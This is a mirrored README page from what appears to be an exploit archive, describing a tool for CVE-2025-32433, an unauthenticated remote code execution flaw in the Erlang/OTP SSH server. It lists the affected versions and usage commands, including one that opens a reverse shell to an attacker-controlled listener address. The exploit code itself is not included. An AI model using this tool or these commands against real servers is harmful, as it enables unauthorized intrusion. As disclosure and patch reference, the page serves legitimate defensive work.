Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%

CVE-2025-32433 PoC — Erlang/OTP SSH Vulnerable to Pre-Authentication RCE

Source
Associated Vulnerability
Title:Erlang/OTP SSH Vulnerable to Pre-Authentication RCE (CVE-2025-32433)
Description:Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.
Description
CVE-2025-32433 Erlang/OTP SSH RCE Exploit  SSH远程代码执行漏洞EXP
Readme
# CVE-2025-32433 Erlang/OTP SSH RCE EXP

## Description

A serious vulnerability has been identified in the Erlang/OTP SSH server that may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This could lead to compromise of said hosts, allowing for unauthorized access to and manipulation of sensitive data by third parties, or denial-of-service attacks.

## Affected Versions
    OTP-27.3.2 and earlier
    OTP-26.2.5.10 and earlier
    OTP-25.3.2.19 and earlier
    
## Features
- Exploit Execution: Execute arbitrary commands.
- Reverse Shell: Initiate a bash-based reverse shell.

    
## Usage

### Execute a command:
    cve-2025-32433.exe 127.0.0.1 -c 'id'
    ./cve-2025-32433.lnx 127.0.0.1 -c 'id'
### Initiate a reverse shell:
    cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
    ./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
    
 ![CVE-2025-32433](cve-2025-32433.png)
   
## References
  
  [GitHub Advisory](https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2)
  
  [NVD CVE-2025-32433](https://nvd.nist.gov/vuln/detail/CVE-2025-32433)
  
  [Platform Security](https://platformsecurity.com/blog/CVE-2025-32433-poc)

https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC
File Snapshot

[4.0K] /data/pocs/f7d9830f49ee2f9189a3a4b1c75eb26a29329a72 ├── [227K] cve-2025-32433.png └── [1.4K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →